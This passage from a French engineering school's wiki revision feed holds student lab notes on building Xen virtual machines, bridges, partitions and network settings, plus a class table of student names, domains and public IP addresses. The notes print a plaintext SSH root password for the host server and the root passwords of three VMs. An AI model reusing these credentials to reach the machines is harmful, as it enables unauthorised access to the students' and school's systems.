'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IP de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.162<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
<br />
Depuis <code>/etc/resolv.conf :</code><syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&diff=11411
SE4 IdO sécurité système/réseau 2025/2026
2026-01-26T10:33:13Z
<p>Cpayet : /* Tableau des commutateurs virtuels */</p>
<hr />
<div>= Répartition des binômes pour les travaux pratiques "administration système et réseau" =<br />
<br />
Préfixe des noms de machine : <code>SE4</code>.<br />
<br />
Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elève !! Nom de domaine<br />
! Nom de machine de services !! Nom de machine mandataire<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || || SE4.C2||SE4.Garage<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || || SE4.RS7||SE4.Garage<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice<br />
|-<br />
|}<br />
<br />
{| class="wikitable"<br />
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves <br />
|-<br />
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE<br />
|-<br />
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST<br />
|-<br />
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE<br />
|-<br />
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI <br />
|-<br />
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN<br />
|-<br />
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki<br />
|-<br />
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.<br />
|-<br />
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi <br />
|-<br />
|}<br />
<br />
= Tableau des commutateurs virtuels =<br />
<br />
{| class="wikitable"<br />
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé <br />
|-<br />
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24<br />
|-<br />
|PAYET / DELOBELLE<br />
|pont_pacman<br />
|192.168.10.0/24<br />
|-<br />
|MERIEN / VANGHELUWE<br />
|pont_pere<br />
|192.168.0.0/24<br />
|-<br />
|CHEKLAT / BIERNACKI<br />
|pont_ironman<br />
|192.168.69.0/24<br />
|}<br />
<br />
= Tableau des réseaux virtuels =<br />
<br />
VLAN privés :<br />
<br />
{| class="wikitable"<br />
! Nom !! Numéro <br />
|-<br />
| VLAN1 || 1<br />
|-<br />
| MV-PROMO || 2 <br />
|-<br />
|}<br />
<br />
VLAN communs avec l'école :<br />
<br />
{| class="wikitable"<br />
! Nom !! Numéro <br />
|-<br />
| INTERCO1 || 530 <br />
|-<br />
|}<br />
<br />
= Schéma de câblage =<br />
<br />
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.<br />
<br />
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.<br />
<br />
= Plan d'adressage =<br />
<br />
{| class="wikitable"<br />
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 <br />
|-<br />
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code><br />
|-<br />
|}<br />
<br />
Adresses IPv4 des éléments réseau dans VLAN1<br />
<br />
{| class="wikitable"<br />
! Elément !! Adresse <br />
|-<br />
| Routeur C9200-E304 ||<br />
|-<br />
| Routeur C9200-E306 ||<br />
|-<br />
| Borne Wi-Fi E304 ||<br />
|-<br />
| Borne Wi-Fi E306 ||<br />
|-<br />
|}<br />
<br />
= Informations VRRP =<br />
<br />
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.<br />
<br />
== VLAN des machines virtuelles ==<br />
<br />
Une seule instance VRRP dans le VLAN des machines virtuelles.<br />
<br />
Adresse IPv4 virtuelle : <code>193.48.57.162</code><br />
<br />
{| class="wikitable"<br />
! Routeur !! IPv4 propre <br />
|-<br />
| C9200 E304 || <code>193.48.57.163</code><br />
|- <br />
| C9200 E306 || <code>193.48.57.164</code><br />
|-<br />
|}<br />
<br />
== VLAN ... ==</div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&diff=11407
SE4 IdO sécurité système/réseau 2025/2026
2026-01-26T10:25:14Z
<p>Cpayet : /* Tableau des commutateurs virtuels */</p>
<hr />
<div>= Répartition des binômes pour les travaux pratiques "administration système et réseau" =<br />
<br />
Préfixe des noms de machine : <code>SE4</code>.<br />
<br />
Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elève !! Nom de domaine<br />
! Nom de machine de services !! Nom de machine mandataire<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || || SE4.C2||SE4.Garage<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || || SE4.RS7||SE4.Garage<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice<br />
|-<br />
|}<br />
<br />
{| class="wikitable"<br />
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves <br />
|-<br />
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE<br />
|-<br />
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST<br />
|-<br />
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE<br />
|-<br />
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI <br />
|-<br />
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN<br />
|-<br />
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki<br />
|-<br />
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.<br />
|-<br />
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi <br />
|-<br />
|}<br />
<br />
= Tableau des commutateurs virtuels =<br />
<br />
{| class="wikitable"<br />
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé <br />
|-<br />
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24<br />
|-<br />
|PAYET / DELOBELLE<br />
|pont_pacman<br />
|192.168.4.0/24<br />
|}<br />
<br />
= Tableau des réseaux virtuels =<br />
<br />
VLAN privés :<br />
<br />
{| class="wikitable"<br />
! Nom !! Numéro <br />
|-<br />
| VLAN1 || 1<br />
|-<br />
| MV-PROMO || 2 <br />
|-<br />
|}<br />
<br />
VLAN communs avec l'école :<br />
<br />
{| class="wikitable"<br />
! Nom !! Numéro <br />
|-<br />
| INTERCO1 || 530 <br />
|-<br />
|}<br />
<br />
= Schéma de câblage =<br />
<br />
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.<br />
<br />
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.<br />
<br />
= Plan d'adressage =<br />
<br />
{| class="wikitable"<br />
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 <br />
|-<br />
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code><br />
|-<br />
|}<br />
<br />
Adresses IPv4 des éléments réseau dans VLAN1<br />
<br />
{| class="wikitable"<br />
! Elément !! Adresse <br />
|-<br />
| Routeur C9200-E304 ||<br />
|-<br />
| Routeur C9200-E306 ||<br />
|-<br />
| Borne Wi-Fi E304 ||<br />
|-<br />
| Borne Wi-Fi E306 ||<br />
|-<br />
|}<br />
<br />
= Informations VRRP =<br />
<br />
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.<br />
<br />
== VLAN des machines virtuelles ==<br />
<br />
Une seule instance VRRP dans le VLAN des machines virtuelles.<br />
<br />
Adresse IPv4 virtuelle : <code>193.48.57.162</code><br />
<br />
{| class="wikitable"<br />
! Routeur !! IPv4 propre <br />
|-<br />
| C9200 E304 || <code>193.48.57.163</code><br />
|- <br />
| C9200 E306 || <code>193.48.57.164</code><br />
|-<br />
|}<br />
<br />
== VLAN ... ==</div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11402
Atelier SysRes SE4 2025/2026 E5
2026-01-26T10:15:43Z
<p>Cpayet : /* Configuration réseau */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.3/24<br />
gateway 172.60.0.1<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IP de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.162<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
<br />
Depuis <code>/etc/resolv.conf :</code><syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
